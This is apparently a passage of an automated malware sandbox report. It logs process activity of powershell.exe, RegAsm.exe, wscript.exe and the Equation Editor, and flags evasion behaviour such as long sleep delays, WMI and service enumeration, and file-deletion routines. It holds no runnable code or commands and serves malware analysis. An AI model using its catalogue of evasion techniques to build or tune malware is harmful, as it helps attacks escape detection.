            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0040F7A7 Sleep,ExitProcess,8_2_0040F7A7
            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,12_2_0040DD85
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,8_2_0041A748
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5197Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 608Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 8858Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: foregroundWindowGot 1634Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3596
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6285
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6496
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-53440
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2932Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3172Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -4611686018427385s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -1800000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3104Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3240Thread sleep count: 245 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3240Thread sleep time: -122500s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3244Thread sleep count: 608 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3244Thread sleep time: -1824000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3352Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3244Thread sleep count: 8858 > 30Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3244Thread sleep time: -26574000s >= -30000sJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3432Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3544Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exe TID: 3544Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3796Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3748Thread sleep time: -3600000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep count: 6496 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3904Thread sleep count: 3446 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3964Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3968Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_00409253
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C291
